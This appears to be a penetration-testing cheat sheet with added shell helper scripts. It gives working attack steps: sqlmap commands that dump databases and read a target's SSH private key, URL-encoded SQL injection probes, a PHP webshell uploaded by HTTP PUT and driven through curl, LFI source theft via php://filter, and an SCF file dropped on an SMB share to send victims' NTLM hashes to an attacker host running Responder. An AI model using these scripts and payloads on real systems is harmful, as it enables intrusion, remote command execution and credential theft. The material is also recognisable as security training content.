##Save a request from Burp to a file (right-click the request and use "Copy to file").
##Let's assume a request where the parameter "id" might be injectable. Save the request to a file called id.req.
##Then run sqlmap with -r and the request file, and -p with the name of the parameter to test.
> sqlmap -r id.req -p id

##Another way of telling sqlmap which parameter to test is to mark the injection point inside the request file with an asterisk (*) directly after the parameter's value, e.g. id=1*. Every parameter marked this way is tested and -p is not needed.
## --dump dumps the entries of the database tables; add -D and/or -T to limit it to one database or table (--dump-all dumps every database).
> sqlmap -r file.req --dump
## It is also possible to read local files off the target system, but only if the database user has file privileges (on MySQL the FILE privilege, with secure_file_priv not blocking the path) and the file lives on the DBMS host; otherwise sqlmap reports that the file could not be read.
> sqlmap -r file.req --file-read /home/offensiveuser/.ssh/id_rsa


Manual injection testing

##Put a single quote (') into the parameter and check whether the response changes (SQL error, empty page, different content).
##Append a comment sequence such as -- - (two dashes, a space, then a dash; the trailing dash keeps the mandatory space from being stripped) or # on MySQL to neutralise the rest of the original query so the closed string does not break it.
##URL-encode the payload in the browser address bar (a raw # is treated as a URL fragment and never sent, a space has to become %20 or +).
##URL-encode everything in Burp as well: Repeater/Intruder send the request exactly as typed (Ctrl+U URL-encodes key characters of the selected text).
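Marking the injection point for sqlmap and hand-building URL-encoded probes for Burp are the same chore, editing one parameter in a saved request, so here is one added shell helper that covers both notes above. It is not from the original notes; the request-file layout (parameter in the request line's query string or in a form-encoded body), the parameter names and the probe list are assumptions, and the Content-Length header is deliberately left alone because Burp and sqlmap recompute it.

```sh
#!/bin/sh
# Added example, not part of the original notes. Assumes ASCII payloads and a
# request saved as plain text from Burp. Content-Length is not adjusted.

cr=$(printf '\r')   # literal CR, so a value at the end of a CRLF line is not swallowed

# Percent-encode everything except RFC 3986 unreserved characters.
urlencode() {
    s=$1
    while [ -n "$s" ]; do
        c=${s%"${s#?}"}            # first character
        s=${s#?}                   # rest of the string
        case "$c" in
            [A-Za-z0-9._~-]) printf '%s' "$c" ;;
            *) printf '%%%02X' "'$c" ;;   # "'x" makes printf print the byte value of x
        esac
    done
}

# Append sqlmap's * marker to the value of parameter $2 in request file $1.
mark_injection_point() {
    sed -E "s/([?&]|^)($2=[^& $cr]*)/\1\2*/g" "$1"
}

# Replace the value of parameter $2 in request file $1 with $3 (already encoded).
set_param() {
    esc=$(printf '%s' "$3" | sed 's/[&/\]/\\&/g')   # escape sed replacement metachars
    sed -E "s/([?&]|^)$2=[^& $cr]*/\1$2=$esc/g" "$1"
}

# Print the classic first probes, URL-encoded for pasting into Burp.
sqli_probes() {
    for p in "'" "''" "' -- -" "' OR '1'='1' -- -" "1 AND 1=2 -- -"; do
        urlencode "$p"
        echo
    done
}

# Demo on a constructed request (run with: sh sqli_helpers.sh demo).
if [ "${1:-}" = demo ]; then
    req=$(mktemp)
    printf 'GET /item.php?id=1&page=2 HTTP/1.1\r\nHost: target\r\n\r\n' > "$req"
    mark_injection_point "$req" id | head -n 1
    set_param "$req" id "$(urlencode "' -- -")" | head -n 1
    sqli_probes
    rm -f "$req"
fi
```

The marked file goes to `sqlmap -r` without `-p`; the probe variants go into Repeater, where the only thing to compare is how the response differs between the bare quote and the quote with the comment appended.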



RCE via PHP:
##Check whether the HTTP PUT method is allowed (send OPTIONS and look at the Allow header) or whether the application offers any other way to upload a .php file.
##Then upload a PHP shell with PUT and call it to execute commands (replace http://target/ with the real URL and path)
> curl -v -X OPTIONS http://target/
> curl -v -X PUT -T rev_shell.php http://target/rev_shell.php

> curl -v -X PUT -d 'my data as a string' http://target/file.php
> curl -v -X PUT --data-binary @/path/to/file http://target/file.php
##(-d @file strips the newlines out of the file, --data-binary sends it byte for byte; -T does a PUT of the file as well)

##Or save the following code as a .php file and upload it via the application, then call it as shell.php?offensive=id
> <?php system($_REQUEST['offensive']);?>
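The PUT check and the webshell round trip as shell functions, added here as an example (not code from the original notes). http://target/ and the parameter name offensive are placeholders, offensive matching the one-liner above; the Allow header parsing and the shell file run offline, the curl functions need a target.

```sh
#!/bin/sh
# Added example, not part of the original notes. URLs and the "offensive"
# parameter are placeholders; check_put/upload_shell/run_cmd need a target.

# Read raw response headers on stdin; succeed if the Allow header lists PUT.
allows_put() {
    tr -d '\r' | grep -i '^Allow:' | cut -d: -f2- | tr ',' '\n' |
        tr -d ' \t' | grep -qix 'PUT'
}

# Write the minimal command-execution shell to $1.
make_webshell() {
    printf '%s\n' "<?php system(\$_REQUEST['offensive']); ?>" > "$1"
}

# OPTIONS request against $1; prints the verdict, returns allows_put's status.
check_put() {
    if curl -s -i -X OPTIONS "$1" | allows_put; then
        echo "PUT allowed on $1"
    else
        echo "PUT not listed in Allow for $1 (try anyway, some servers omit it)"
        return 1
    fi
}

# PUT local file $2 to URL $1. --data-binary keeps the file byte for byte
# (plain -d would strip newlines); -T would do the same.
upload_shell() {
    curl -s -o /dev/null -w 'PUT %{url_effective}: HTTP %{http_code}\n' \
        -X PUT --data-binary @"$2" "$1"
}

# Run command $2 through the uploaded shell at $1; curl URL-encodes it.
run_cmd() {
    curl -s -G --data-urlencode "offensive=$2" "$1"
}

# Usage (needs a target):
#   make_webshell rev_shell.php
#   check_put http://target/ && upload_shell http://target/rev_shell.php rev_shell.php
#   run_cmd http://target/rev_shell.php id
```

A 201 or 204 from the PUT means the file was written; a 405 means the method is rejected for that path, and 403 usually means PUT works but the directory is not writable for the web server user.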


PHP wrapper for LFI:
##Pass the filter wrapper as the parameter value. It is mainly useful for .php files: a plain include would execute them and show nothing, whereas the base64 filter returns the source encoded, which is then decoded locally (base64 -d).
> (url)?var1=1&var2=php://filter/convert.base64-encode/resource=/path/to/file.php
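Building the wrapper URL and pulling the source back out of the response, as an added example that is not from the original notes. The base URL, the parameter name var2 and the HTML around the encoded blob are placeholders or constructed; extract_source works offline on a saved response, pull_source needs the target.

```sh
#!/bin/sh
# Added example, not part of the original notes. URL and parameter names are
# placeholders; only pull_source talks to a target.

# Print the URL that makes the include return file $3 base64-encoded via parameter $2.
filter_url() {
    printf '%s?%s=php://filter/convert.base64-encode/resource=%s\n' "$1" "$2" "$3"
}

# Read the response on stdin, take the longest base64-looking run (the encoded
# source usually lands somewhere inside the page markup) and decode it.
extract_source() {
    grep -o '[A-Za-z0-9+/=]\{16,\}' |
        awk 'length($0) > length(best) { best = $0 } END { print best }' |
        base64 -d
}

# Fetch and decode in one go, e.g.
#   pull_source http://target/index.php var2 /var/www/html/config.php
pull_source() {
    curl -s "$(filter_url "$1" "$2" "$3")" | extract_source
}
```

If the decoded output is garbage, the longest run was not the blob (a CSS class or a token outlived it); save the raw response and grep for the "PD9waHA" prefix, which is "<?php" in base64.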


Steal NTLM hash with writeable SMB share:
##Put an SCF file inside the Windows share. Explorer renders the icon the SCF file points to, so the victim's machine authenticates via SMB to the UNC path (the Responder host) as soon as a user browses the share's directory (LINK). The leading @ makes the file sort first in the listing, so it is rendered right away.
> vim @offensiveIT.scf
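Generating the SCF file and dropping it on the share, as an added example that is not from the original notes. The attacker IP, the share and icon names, the network interface and the share credentials are placeholders; only make_scf runs offline.

```sh
#!/bin/sh
# Added example, not part of the original notes. IPs, names, interface and
# credentials below are placeholders.

# Write an SCF file to $2 whose icon lives at \\$1\share\icon.ico. Explorer
# fetches the icon over SMB and authenticates to $1 while doing so. Lines end
# in CRLF, as Windows expects for INI-style files.
make_scf() {
    printf '[Shell]\r\nCommand=2\r\nIconFile=\\\\%s\\share\\icon.ico\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n' "$1" > "$2"
}

# Upload local file $3 to share $1 (//server/share) as user $2; smbclient asks for the password.
drop_scf() {
    smbclient "$1" -U "$2" -c "put $3"
}

# Usage:
#   make_scf 10.10.14.5 @offensiveIT.scf
#   sudo responder -I tun0                       # catch the NTLMv2 response on the attacker box
#   drop_scf //target/share user @offensiveIT.scf
```

Responder prints the NetNTLMv2 hash of whichever user opens the folder; the hash is for cracking or relaying, it is not reusable as-is.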